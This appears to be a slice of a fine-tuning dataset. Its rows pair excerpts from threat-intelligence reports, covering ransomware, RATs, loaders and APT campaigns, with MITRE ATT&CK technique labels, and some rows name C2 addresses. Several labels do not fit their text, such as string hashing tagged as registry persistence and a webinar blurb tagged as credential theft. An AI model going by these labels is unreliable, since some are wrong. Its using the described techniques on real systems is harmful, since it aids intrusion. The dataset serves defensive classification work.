263The encrypted file names are appended with a string of random characters as the new extension. For example, it renames a file named “My_files.zip” to “My_files.zip.IAsnM”, “My_files2.zip” to “My_files2.zip.WZlF” and so on. Also, the threat actor creates the “RECOVER-FILES.txt” with ransom note in all folders that contain encrypted files, as shown in the figure below['T1486 - Data Encrypted for Impact']fine_tune
264Task 0x1: react_exec The react_exec command appears to execute a payload received from the server. Interestingly it attempts to first execute the payload directly from memory. Specifically it invokes a function named ei_run_memory_hrd which invokes the Apple NSCreateObjectFileImageFromMemory, NSLinkModule, NSLookupSymbolInModule, and NSAddressOfSymbol APIs to load and link the in-memory payload. In some cases the file will be set to executable via a call to chmod. Specifically it instructs the malware to spawn a background thread to execute a function named eilf_rglk_watch_routine. This function creates an event tap (via the CGEventTapCreate API), add it to the current runloop, then invokes the CGEventTapEnable to activate the event tap['T1106 - Native API']fine_tune
265Its functions include self-starting of the backdoor, collection of network configuration, keystroke recording, and scheduling other modules to execute by means of timers['T1016 - System Network Configuration Discovery']fine_tune
266Talos has identified at least three different campaigns since July 2019. It is interesting to note that this threat actor uses HTTPS on the C2. They always use self-signed certificates['T1587.003 - Digital Certificates']fine_tune
267The malware will then write a base64 encoded PowerShell script (which is contained in xmlparse.dll as a resource) to \%TEMP%\enu1.ps1 and execute it. The script, intended for reconnaissance purposes, checks if a machine is part of a domain and if the user has Admin privileges or is part of the Admin Group['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
268The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to steal banking and other sensitive credentials for exfiltration by attackers. The payload that Talos analyzed was a multi-stage payload, with the initial stage featuring several anti-analysis techniques designed to make analysis more difficult and prolonged execution to avoid detection. It also featured several evasion techniques designed to ensure that the malware would not execute properly in automated analysis environments, or sandboxes. The overall operation of the Zeus Panda banking trojan has been well documented; however, Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects any of the following keyboard mappings['T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1614.001 - System Location Discovery: System Language Discovery']fine_tune
269Grandoreiro also employs a technique for privilege escalation described in more detail here. The method relies on registering a binary as the default handler for .MSC files and then running such a file['T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control']fine_tune
270For the purpose of social engineering, the threat actor chose file names related to legitimate online services, including Microsoft OneDrive. In a few instances, we observed the use of file names resembling McAfee’s endpoint security product. Even the file icons for these binaries are selected to masquerade as the corresponding legitimate applications['T1036 - Masquerading']fine_tune
271Additionally, each beacon is accompanied with a screenshot that is initially saved as ‘scr.jpg’ in the public directory and subsequently issued to the C2 using the same HTTP POST request as in the ‘uploadsf’ command['T1113 - Screen Capture']fine_tune
272The TajMahal framework is an intriguing discovery that’s of great interest, not least for its high level of technical sophistication, which is beyond any doubt. For example, it has its own indexer, emergency C2s, is capable of stealing specific files from external drives when they become available again, etc['T1083 - File and Directory Discovery', 'T1119 - Automated Collection', 'T1041 - Exfiltration Over C2 Channel']fine_tune
273Analysis of the “log.dat” payloads determined them to be variants of the publicly available POSHC2 proxy-aware stager written to download and execute PowerShell payloads from a hardcoded command and control (C2) address. These particular POSHC2 samples run on the .NET framework and dynamically load payloads from Base64 encoded strings['T1132.001 - Data Encoding: Standard Encoding']fine_tune
274This threat group has conducted broad targeting across a variety of industries, including financial, government, energy, chemical, and telecommunications. Join us in a live webinar as we discuss this threat group whom we assess to be working on behalf of the Iranian Government, with a mission that would benefit nation-state geopolitical and economic needs. APT34 uses a mix of public and non-public tools, often conducting spear phishing operations using compromised accounts from trusted third parties, sometimes coupled with social engineering tactics. Register today to gain deeper insights into this threat group['T1555.003 - Credentials from Password Stores: Credentials from Web Browsers']fine_tune
275The ‘tasklist’ command will use a WMI query or the “ps” command, which allows Kazuar to obtain running processes from both Windows and Unix systems. Also, Kazuar’s ‘cmd’ command will run commands using “cmd.exe” for Windows systems and “/bin/bash” for Unix systems. These two commands provide evidence that the authors of Kazuar intended to use this malware as a cross-platform tool to target both Windows and Unix systems['T1047 - Windows Management Instrumentation', 'T1057 - Process Discovery']fine_tune
276Obviously, the request sent to the C&C is encoded with Base64. The bot subsequently receives its unique ID and uses it for identification at the start of the packet['T1027 - Obfuscated Files or Information']fine_tune
2771) Writes itself to %AppData%\Microsoft\Word\log.ps1 2) Sets up persistence for this file, using a run key. 3) Adds a registry key so that future powershell.exe instances are spawned off-screen by default – this trick is explained here. 6) Removes all registry entries that are left behind during the dropper process['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1564.003 - Hide Artifacts: Hidden Window', 'T1112 - Modify Registry']fine_tune
278After deobfuscation you can see “Imminent Monitor” string which may indicate it is related to Imminent Monitor RAT['T1070.004 - Indicator Removal on Host: File Deletion', 'T1123 - Audio Capture', 'T1125 - Video Capture']fine_tune
279In February 2013, AlienVault performed analysis on the CallMe Trojan and found that it is based on a tool called Tiny SHell, an OSX shell tool whose source code is available on the Internet. The Trojan uses AES to encrypt the communication channel with its C2 server, which will provide one of three commands to carry out activities on the compromised system, as seen in Table 4['T1059.004 - Command and Scripting Interpreter: Bash', 'T1573.001 - Symmetric Cryptography']fine_tune
280Aside from the aforementioned executables, the droppers also contained a remote access Trojan (RAT). The RAT executable allows criminals to perform various operations on a host, such as uploading/downloading, executing files, etc['T1105 - Ingress Tool Transfer', 'T1547 - Boot or Logon Autostart Execution']fine_tune
281CTU analysis indicates that BRONZE BUTLER primarily targets organizations located in Japan. The threat group has sought unauthorized access to networks of organizations associated with critical infrastructure, heavy industry, manufacturing, and international relations. Secureworks analysts have observed BRONZE BUTLER exfiltrating the following categories of data['T1039 - Data from Network Shared Drive', 'T1005 - Data from Local System']fine_tune
282The Trojan will attempt to inject code into these browsers to carry out its C2 communications. To carry out C2 communications via injected code in a remote process, the injected code reaches out to the C2 server and saves the response to a memory mapped file named SNFIRNW. Command and Control Communications In addition to being able to communicate with its C2 server from code injected into a web browser, the Trojan can also carry out the same communication process within its own process['T1071.001 - Application Layer Protocol: Web Protocols', 'T1055 - Process Injection']fine_tune
283All the scripts are deleted immediately after being executed. TeamTNT also uses the “history -c” command to clear the shell log in every script['T1070.004 - Indicator Removal on Host: File Deletion', 'T1070.003 - Indicator Removal on Host: Clear Command History']fine_tune
284McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact['T1560 - Archive Collected Data', 'T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1573.001 - Symmetric Cryptography']fine_tune
285Transparent Tribe has historically used military and defense-themes in their phishing emails and maldocs to target Indian military and government personnel. Figure 6: Transparent Tribe's spear-phishing email targeting defense personnel. This is in line with previous reporting on Transparent Tribe's use of official COVID-19 applications and content to serve Android malware. Figure 7: Attached malicious XLS macro. Another lure targeted Indian Defense Advisors attached to various Indian embassies in Southeast Asia, as seen in Figure 8['T1566.001 - Phishing: Spearphishing Attachment']fine_tune
286Execute a remote shell; - Silently start a program on a victim host; - Retrieve a list of processes from the victim host; - Terminate any process; - Upload/Download/Delete files to/from victim host; - Retrieve a list of available drives from the victim host; - Retrieve a filelist of a specified folder from the victim host['T1105 - Ingress Tool Transfer', 'T1083 - File and Directory Discovery']fine_tune
287While the ports associated with this sample’s configuration pertain normally to HTTP, HTTPS, or DNS, network communication takes place via raw sockets['T1095 - Non-Application Layer Protocol', 'T1571 - Non-Standard Port']fine_tune
288If the victim appears valuable to the attackers, a GRIFFON implant installer is pushed to the victim’s workstation. This module stores another instance of the GRIFFON implant inside the registry to achieve persistence. Here is a PowerLinks-style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon. The new GRIFFON implant is written to the hard drive before each execution, limiting the “file-less” aspect of this method['T1059.007 - Command and Scripting Interpreter: JavaScript']fine_tune
289This folder is used as a temporary location to copy all files from a newly connected logical drive to and upload them to the C2 server. The files are transferred to the hardcoded C2 server "195.62.52.93" one by one via HTTP POST method. The following request is used which also includes information about the victim, the file to be transferred as well as the source drive['T1083 - File and Directory Discovery', 'T1041 - Exfiltration Over C2 Channel', 'T1071.001 - Application Layer Protocol: Web Protocols']fine_tune
290It then modifies several registry key values to disable the IE browser’s functions such as auto-complete, auto-suggest, etc. The disabled keys are: "Use FormSuggest", "FormSuggest Passwords", "FormSuggest PW Ask" under the sub-key “HKCU\Software\Microsoft\Internet Explorer\Main”, and "AutoSuggest" under the sub-key "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\AutoComplete['T1112 - Modify Registry']fine_tune
291Indeed, any decent firewall would block incoming packets to any ports that have not explicitly been opened for operational purposes. However, with Chaos using a raw socket, the backdoor can be triggered on ports running an existing legitimate service. As an example, a Webserver that would only expose SSH (22), HTTP (80) and HTTPS (443) would not be reachable via a traditional backdoor due to the fact that those services are in use, but with Chaos it becomes possible['T1205 - Traffic Signaling']fine_tune
292The malicious script executed by the Microsoft Publisher file downloads and runs yet another JavaScript file, 0.js, hosted on the attacker-controlled server['T1105 - Ingress Tool Transfer']fine_tune
293The Netsh commands for Windows Firewall provide a command-line alternative to the capabilities of the Windows Firewall Control Panel utility. By using the Netsh firewall commands, you can configure and view Windows Firewall exceptions and configuration settings['T1518.001 - Software Discovery: Security Software Discovery', 'T1562.004 - Impair Defenses: Disable or Modify System Firewall']fine_tune
294Strings in the malware are obfuscated using the RC4 algorithm and the decryption key stored inside the sample['T1027 - Obfuscated Files or Information']fine_tune
295This specific key is set to point towards the path of the previously copied Cardinal RAT executable path. The executable will periodically query this registry key to ensure it is set appropriately. If the executable finds the registry key has been deleted, it will re-set it. The Load registry key acts as a persistence mechanism, ensuring that this Cardinal RAT executes every time a user logs on['T1112 - Modify Registry']fine_tune
296Additional tools were recovered during the incident, including a network scanning/enumeration tool, the archiving tool WinRAR and a bespoke Microsoft SharePoint enumeration and data dumping tool, known as ‘spwebmember['T1213.002 - Sharepoint', 'T1018 - Remote System Discovery', 'T1213.002 - Sharepoint']fine_tune
297Overall the code is very well written and designed to execute quickly to encrypt the defined files in the configuration of the ransomware. The embedded configuration file has some interesting options which we will highlight further in this article['T1027 - Obfuscated Files or Information']fine_tune
298The group has the capability to set up phishing infrastructure to mimic well known websites and trick victims to enter their credentials. This is one of the main methods used by this actor to collect email addresses that later will be used to send spearphishing emails['T1586.002 - Email Accounts']fine_tune
299Use of custom routines to decrypt strings (Deobfuscate/Decode Files or Information [T1140]) - Ability to self-delete once installed (Indicator Removal on Host: File Deletion [T1070.004]) - Masquerade as GrowlHelper (Masquerading: Masquerade Task or Service [T1036.004]) - And as Software Update Check (Masquerading: Masquerade Task or Service [T1036.004]) - Decrypt strings in-memory, per CIA guidelines (Obfuscated Files or Information [T1027['T1140 - Deobfuscate/Decode Files or Information']fine_tune
300With the emergence of the Log4j security vulnerability, we’ve already seen multiple threat actors, mostly financially motivated, immediately add it to their exploitation arsenal. It comes as no surprise that some nation-sponsored actors also saw this new vulnerability as an opportunity to strike before potential targets have identified and patched the affected systems['T1595.002 - Vulnerability Scanning']fine_tune
301The attack group has made incremental changes to ZeroT since our last analysis. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously['T1573.001 - Symmetric Cryptography']fine_tune
302Depending on the Ramsay version, file collection won’t be restricted to the local system drive, but also will search additional drives such as network or removable drives['T1039 - Data from Network Shared Drive']fine_tune
303We were able to expand on some of the findings about the group and provide insights into the additional variants that it uses. We were able to trace the implant back to at least 2015, where it also had variants intended to hijack the execution of the Telegram and Chrome applications as a persistence method['T1036.005 - Masquerading: Match Legitimate Name or Location']fine_tune
304During execution, the code employs byte randomization to obscure its behavior. This is achieved by using the host’s current time as a seed for a pseudorandom number generator, and then performing additional operations against that output. The resulting values are used to overwrite blocks of previously executed code. This byte manipulation is the first anti-analysis technique observed in the code, as any attempt to dump the memory segment would result in illegitimate or incorrect operations['T1001.001 - Junk Data']fine_tune
305The worm deploys the XMRig mining tool to mine monero crypto-currency and generate cash for the attackers. One of the Mining pools they use provides detailed information about the systems the worm has compromised['T1496 - Resource Hijacking']fine_tune
306Avira’s Advanced Threat Research team has been tracking Mustang Panda APT for a while. According to Avira’s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload['T1204.002 - User Execution: Malicious File', 'T1049 - System Network Connections Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility', 'T1057 - Process Discovery', 'T1016 - System Network Configuration Discovery', 'T1083 - File and Directory Discovery']fine_tune
307It also deletes Windows Event Logs: Application, Security, Setup, System. It is less focused on deleting documents['T1070.001 - Indicator Removal on Host: Clear Windows Event Logs']fine_tune
308We have been tracking RDAT since 2017, when we first saw this tool uploaded to a webshell related to the TwoFace webshell discussed in our Striking Oil blog published on September 26, 2017. RDAT has been under active development since 2017, resulting in multiple variations of the tool that rely on both HTTP and DNS tunneling for C2 communications. In June 2018, the developer of RDAT added the ability to use Exchange Web Services (EWS) to send and receive emails for C2 communications. This email-based C2 channel is novel in its design, as it relies on steganography to hide commands and exfiltrates data within BMP images attached to the emails. The combination of using emails with steganographic images to carry the data across the C2 can result in this activity being much more difficult to detect and allow for higher chances of defense evasion['T1071.003 - Mail Protocols', 'T1001.002 - Data Obfuscation via Steganography']fine_tune
309Comnie Malware Family Comnie uses the RC4 algorithm in multiple locations both to obfuscate strings used by the malware, as well as for network communication. More information about how Comnie handles identified security products may be found in the technical analysis in the Appendix. Comnie is able to achieve persistence via a .lnk file that is stored within the victim’s startup path. When originally run, Comnie will convert itself from an executable file to a DLL and will write this newly created DLL to the host machine’s %APPDATA% directory. Unit 42 has observed a total of two variants of Comnie. In older variants, Comnie was found to look for the ‘++a++’ markers. The example C2s used by older variants of Comnie demonstrates this['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
310DropBook’s capabilities include checking installed programs and file names for reconnaissance, executing shell commands received from Facebook or Simplenote, and fetching additional payloads from Dropbox and running them['T1059.003 - Command and Scripting Interpreter: Windows Command Shell', 'T1105 - Ingress Tool Transfer', 'T1083 - File and Directory Discovery']fine_tune
311The malware uploads the stolen data to third-party cloud storage providers. The sample identified in the wild is configured to upload to pCloud, but functionality to upload to Dropbox, Box and Yandex Cloud is also included['T1102.002 - Bidirectional Communication']fine_tune
312Valak C2 traffic returns data as encoded ASCII text that is decoded on the victim host and saved as malware items like script files, EXE used during the infection and data for registry updates for the Valak infection['T1564.004 - Hide Artifacts: NTFS File Attributes', 'T1132.001 - Data Encoding: Standard Encoding', 'T1132.001 - Data Encoding: Standard Encoding']fine_tune
313In addition to the encrypted strings table, BitPaymer replaces the remaining strings in the binary with hashes and uses an algorithm to match these hashes with strings that exist on the host. The hash algorithm has been replicated in Python below['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
314It is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt Strike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy more advanced malware until they have fully understood where they were and carried out some initial reconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This new activity from this group shows how resourceful and how quickly they can leverage newly disclosed vulnerabilities to their advantage['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
315In the old campaign the actor used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated. Also, its configuration is encrypted and is not base64 encoded anymore['T1560 - Archive Collected Data']fine_tune
316The “sysid” parameter contains a campaign ID in newer versions of the malware, the Windows version running on the infected machine, system architecture, username, and a random integer['T1082 - System Information Discovery']fine_tune
317Two days later, a second email — purportedly a warning from a Pakistani military about the Pegasus spyware — containing a cutt.ly link to a malicious encrypted Word document and the password for decryption will be sent to the target. The sender address impersonates a service similar to that on the first email (alert@ispr.gov.pk['T1566.002 - Phishing: Spearphishing Link']fine_tune
318Key points PureCrypter is a fully-featured loader being sold since at least March 2021 The malware has been observed distributing a variety of remote access trojans and information stealers The loader is a .NET executable obfuscated with SmartAssembly and makes use of compression, encryption and obfuscation to evade antivirus softwar['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
319The Gamaredon group has been active since at least 2013. Contrary to other APT groups, the Gamaredon group seems to make no effort in trying to stay under the radar. Typical Gamaredon compromise chain . While most of the recent publications have focused on the spearphishing emails together with the downloaders they contain, this blogpost focuses on the post-compromise tools deployed on these systems. Office macro injection module – CodeBuilder . We analyzed different variants of malicious modules used by the Gamaredon group to inject malicious macros or remote templates into documents already present on the compromised system. It then scans for documents with valid Word or Excel file extensions on all drives connected to the system. The most prevalent tools downloaded and installed on compromised machines can be broadly grouped into two different categories: downloaders and backdoors. Backdoors – file stealers . While some variations exist in functionalities, the main purpose of these modules is to enumerate all documents on a compromised system and upload them to the C&C server. The behavior of this module is quite straightforward: it scans the system for new Microsoft Office documents, both on local and removable drives, and uploads them to the C&C server. Quality of execution . We were able to collect numerous different samples of malicious scripts, executables and documents used by the Gamaredon group throughout their campaigns. Conclusion . Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module['T1119 - Automated Collection']fine_tune
320Emotet is an advanced, modular banking Trojan that primarily functions as a downloader or dropper of other banking Trojans. Additionally, Emotet is a polymorphic banking Trojan that can evade typical signature-based detection. It has several methods for maintaining persistence, including auto-start registry keys and services. Furthermore, Emotet is Virtual Machine-aware and can generate false indicators if run in a virtual environment['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder']fine_tune
321The vmtools.dll file is a modified DLL that both ensures persistence and loads MSBuild.exe, which is the BADNEWS malware renamed to spoof a legitimate Microsoft Visual Studio tool. A number of commands are provided to the attackers, including the ability to download and execute additional information, upload documents of interest, and take screenshots of the desktop. This malware family used the new mutex ‘com_mycompany_apps_appname_new’. This variant of BADNEWS uses different filenames compared to previous versions. All of these files reside in the victim’s %TEMP% directory: Other changes we noticed in this variant include how the malware obfuscates C2 information stored via dead drop resolvers. BADNEWS performs many of the expected functions associated with previous versions including keylogging and identifying files of interest. Unlike a previously reported variant, this version of BADNEWS no longer looks at USB drives for interesting files. It continues to seek out files with the following extensions: In order to prepare for C2 communication, BADNEWS will aggregate various victim information, which is appended to two strings. C2 communication is also updated from prior versions, with the following commands now supported by BADNEWS: During C2 communications, BADNEWS will communicate to the C2 previously identified via HTTP. Through the use of relatively new exploits, as well as a constantly evolving malware toolset, they aim to compromise prominent organizations and individuals to further their goals. One of the malware families tied to this group, BADNEWS, continues to be updated both in how it uses dead drop resolvers, as well as how it communicates with a remote C2 server['T1105 - Ingress Tool Transfer']fine_tune
322Fast-paced intrusion • Very stealthy • Rapidly changing tactics • Employed advanced attack techniques. Our Response: Tackled Attacker WMI Usage. ADVANCED ATTACK TECHNIQUES. Captured entire functions of PS scripts, attacker commands, script output, etc. Wrote indicators based on observed attacker activity • Identified lateral movement, unique backdoors, credential theft, data theft, recon, persistence creation, etc. Our Response: Increased PowerShell Visibility. ADVANCED ATTACK TECHNIQUES. Our Response: Addressed Ticket Attacks. ADVANCED ATTACK TECHNIQUES Event ID 4624 Event ID 4672 Event ID 4634. BONUS SLIDE: Even More WMI + PS FUN FACT: We saw the attacker test this backdoor before deployment['T1550.003 - Use Alternate Authentication Material: Pass the Ticket']fine_tune
323Stage2.exe is a beaconing implant that performs an HTTPS connection to download a JPG file hosted on Discord’s content delivery network (CDN). Discord’s CDN is a user-created service that allows users to host attachments and is not malicious. The hosted file is retrieved from the following URL['T1102 - Web Service']fine_tune
324Volgmer payloads have been observed in 32-bit form as either executables or dynamic-link library (.dll) files. The malware uses a custom binary protocol to beacon back to the command and control (C2) server, often via TCP port 8080 or 8088, with some payloads implementing Secure Socket Layer (SSL) encryption to obfuscate communications['T1573.002 - Asymmetric Cryptography']fine_tune
325Encrypting the data. Exfiltrating gathered data through a POST request or by uploading it to an FTP server. Sending execution logs to a remote server['T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol']fine_tune
326Spreadsheets and documents with customer lists, investments and trading operations - Internal presentations - Software licenses and credentials for trading software/platforms - Cookies and session information from browsers - Email credentials - Customer credit card information and proof of address/identity documents['T1539 - Steal Web Session Cookie']fine_tune
327The C# variant of RogueRobin attempts to detect if it is executing in a sandbox environment using the same commands as in the PowerShell variant of RogueRobin. The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system. The Trojan also checks to see if a debugger is attached to its processes and will exit if it detects the presence of a debugger['T1047 - Windows Management Instrumentation', 'T1497.001 - Virtualization/Sandbox Evasion: System Checks']fine_tune
328APT39 facilitates lateral movement through myriad tools such as Remote Desktop Protocol (RDP), Secure Shell (SSH), PsExec, RemCom, and xCmdSvc. Custom tools such as REDTRIP, PINKTRIP, and BLUETRIP have also been used to create SOCKS5 proxies between infected hosts. In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment. To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip['T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1021.004 - Remote Services: SSH', 'T1018 - Remote System Discovery', 'T1560.001 - Archive Collected Data: Archive via Utility', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1090.001 - Proxy: Internal Proxy']fine_tune
329is responsible for a vast amount of information stealing, and is able to collect information through hooking, clipboard usage, and monitoring the keystate['T1115 - Clipboard Data']fine_tune
330At this time, Janicab is not detected by most anti-virus software, and it slips right past the built-in defenses of Mac OS X in the hands of an unobservant or unsavvy user. Further, seeing other malware using a signed app is troubling, as it may indicate that Gatekeeper will not offer as much security as had been hoped for['T1553.002 - Code Signing']fine_tune
331All this information is stored in the C:\Users\Public\Videos\si.ini file and sent in an email message, as an attachment, via SMTPS, using the default port 465. The email body contains the string SI (which probably stands for System Information), the recipient is sym777.g@post.cz. For all email exchange, the message’s Subject is set to the id['T1074.001 - Data Staged: Local Data Staging']fine_tune
332If no exceptions occur, the Windows executable drops a DLL file in the user's AppData\Local\Temp\ directory, creates a randomly-named folder under C:\ProgramData\ directory and moves the DLL under that folder as a random file name. This Redaman DLL is made persistent through a scheduled Windows task with the following properties['T1036.004 - Masquerading: Masquerade Task or Service']fine_tune
333This report provides background on Windows container vulnerabilities, gives a technical overview of Siloscape and offers recommendations on best practices for securing Windows containers['T1068 - Exploitation for Privilege Escalation']fine_tune
334Fine-tuning Daserf: Our analyses revealed Daserf regularly undergoes technical improvements to keep itself under the radar against traditional anti-virus (AV) detection. Daserf 1.72 and later versions use the alternative base64+RC4 to encrypt the feedback data, while others use different encryption such as 1.50Z, which uses the Caesar cipher (which substitutes letters in plaintext with another that corresponds to a number of letters, either upwards or downwards['T1027.002 - Obfuscated Files or Information: Software Packing', 'T1027.005 - Indicator Removal from Tools', 'T1027 - Obfuscated Files or Information']fine_tune
335MSTIC previously tracked ACTINIUM activity as DEV-0157, and this group is also referred to publicly as Gamaredon['T1105 - Ingress Tool Transfer', 'T1608.001 - Upload Malware', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 'T1059.005 - Command and Scripting Interpreter: Visual Basic']fine_tune
336At first glance, these links generally cause less suspicion for the targets. After opening the links and several redirections, the victims are led to final phishing domains such as “mobile[.]recover-session-service[.]site” etc['T1583.001 - Domains']fine_tune
337On July 18, 2018, one day after the AZORult update above was announced, we observed a campaign delivering thousands of messages targeting North America that used the new version of AZORult. The messages used employment-related subjects such as “About a role” and “Job Application”. The attached documents used file names in the format of “firstname.surname_resume.doc['T1140 - Deobfuscate/Decode Files or Information']fine_tune
338The final payload created by the aforementioned process is a well known backdoor, also known as ROKRAT by Cisco Talos. One of its main functions is to steal information. Upon execution, this malware creates 10 random directory paths and uses them for a specially designated purpose['T1083 - File and Directory Discovery']fine_tune
339The executable installed by the compiled AutoIt scripts is a backdoor that Molerats has used in many attack campaigns. Based on our research, the Spark backdoor has been used by Molerats since at least early 2017, as it was the main payload in the Operation Parliament campaign reported by Kaspersky['T1218.007 - Signed Binary Proxy Execution: Msiexec']fine_tune
340To obtain the session ID and pre-shared key, the payload will issue a query to resolve the following domain: mail.<random number between 100000 and 999999>.<c2 name> This request notifies the C2 server that the payload is about to send system specific data as part of the initial handshake['T1016 - System Network Configuration Discovery']fine_tune
341Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments. Disclosure of this information went through the same IGL process as discussed in the Whois Anchor Panda blog post['T1102.002 - Bidirectional Communication']fine_tune
342To perform this task, the developer used the GDI API: A keylogger is also present in the analyzed sample. The SetWindowsHookEx() API is used to retrieve the stroked keys. The GetKeyNameText() API is used to retrieve a string that represents the name of a key. In addition to the key, the title of the foreground window is stored in order to know where the infected user is typing (by using the GetForegroundWindow() and GetWindowText() API['T1010 - Application Window Discovery']fine_tune
343Key Points: PrivateLoader is a downloader malware family that was first identified in early 2021. The loader’s primary purpose is to download and execute additional malware as part of a pay-per-install (PPI) malware distribution service. PrivateLoader is used by multiple threat actors to distribute ransomware, information stealers, banking t['T1105 - Ingress Tool Transfer']fine_tune
344AT&T Alien Labs has discovered new malicious files distributed by the threat actor TeamTNT. The use of open-source tools like Lazagne allows TeamTNT to stay below the radar for a while, making it more difficult for anti-virus companies to detect['T1082 - System Information Discovery', 'T1049 - System Network Connections Discovery']fine_tune
345It also creates a pipe for inter-process communication (IPC) by calling the pipe() function for getting two file descriptors for reading and writing data. It also enables non-blocking I/O for the writing file descriptor by using ioctl['T1559 - Inter-Process Communication']fine_tune
346The threat actor abused the stolen credentials to create rogue, high-privileged domain user accounts which they then used to take malicious action. By creating these accounts, they ensured they would maintain access between different waves of the attack. Once the threat actor regains their foothold, they already have access to a high-privileged domain user account['T1078 - Valid Accounts', 'T1136.002 - Create Account: Domain Account']fine_tune
347Since September of 2018, Redaman banking malware has been distributed through malspam. These emails have file attachments. These file attachments are archived Windows executable files disguised as a PDF document. In September 2018, the attachments were zip archives. In October 2018, the attachments were zip archives, 7-zip archives, and rar archives. In November 2018, the attachments were rar archives. And in December 2018, the attachments changed to gzip archives with file names ending in .gz['T1027 - Obfuscated Files or Information', 'T1566.001 - Phishing: Spearphishing Attachment', 'T1036 - Masquerading']fine_tune
348Volexity has worked with multiple victim organizations to assist with incident response efforts and to remedy their compromised systems. This process led to the identification of different ways the OceanLotus group gains access to the compromised websites and how they maintain access['T1505.003 - Server Software Component: Web Shell']fine_tune
349Anomali Labs has detected a new campaign by the threat group Rocke. In this campaign, the group has changed from using a Python-based malware to a malware written in Golang. The detection of this new malware is nearly non-existent. In addition, the group uses a private mining pool to reduce the risks of being detected['T1059.006 - Command and Scripting Interpreter: Python']fine_tune
350Winnti Linux variant’s core functionality is within ‘libxselinux’. Upon execution, an embedded configuration is decoded from the data section using a simple XOR cipher. An example Python function to decode this configuration is shown below['T1027 - Obfuscated Files or Information', 'T1140 - Deobfuscate/Decode Files or Information']fine_tune
351Lazarus Group is one of the most sophisticated North Korean APTs that has been active since 2009. The group is responsible for many high profile attacks in the past and has gained worldwide attention. The Malwarebytes Threat Intelligence team is actively monitoring its activities and was able to spot a new campaign on Jan 18th 2022['T1105 - Ingress Tool Transfer']fine_tune
352The payload is an application that creates a hidden window (the name of the class and the window is SK_Parasite['T1564.003 - Hide Artifacts: Hidden Window']fine_tune
353kaudited — A file installed as /usr/bin/kaudited. This binary will drop and install several loadable kernel modules (LKMs) on the infected machine. To ensure that the infected machine won’t crash due to the kernel-mode rootkits, it uses different modules for specific kernel versions. The kaudited binary also drops a watchdog component that will monitor the cryptocurrency miner file and process['T1105 - Ingress Tool Transfer']fine_tune
354These credentials are used in a credential stuffing or password spraying attack against the victim’s remote services, such as webmail or other internet reachable mail services. After obtaining a valid account, they use this account to access the victim’s VPN, Citrix or another remote service that allows access to the network of the victim. Information regarding these remote services is taken from the mailbox, cloud drive, or other cloud resources accessible by the compromised account. As soon as they have a foothold on a system (also known as patient zero or index case), they check the permissions of the account on that system, and attempt to obtain a list of accounts with administrator privileges. With this list of administrator accounts, the adversary performs another password spraying attack until a valid admin account is compromised. With this valid admin account, a Cobalt Strike beacon is loaded into memory of patient zero. From here on the adversary stops using the victim’s remote service to access the victim’s network, and starts using the Cobalt Strike beacon for remote access and command and control['T1078.002 - Domain Accounts']fine_tune
355TIN WOODLAWN is a targeted threat group, active since at least 2014, that CTU researchers assess with moderate confidence is operated or tasked by the Vietnamese government. TIN WOODLAWN is technically capable and uses a range of techniques including template injection, obfuscated macros and steganography for malware delivery, memory-resident malware, use of native command line scripts for Cobalt Strike persistence, and non-standard command and control channels such as DNS and ICMP['T1059.001 - Command and Scripting Interpreter: PowerShell']fine_tune
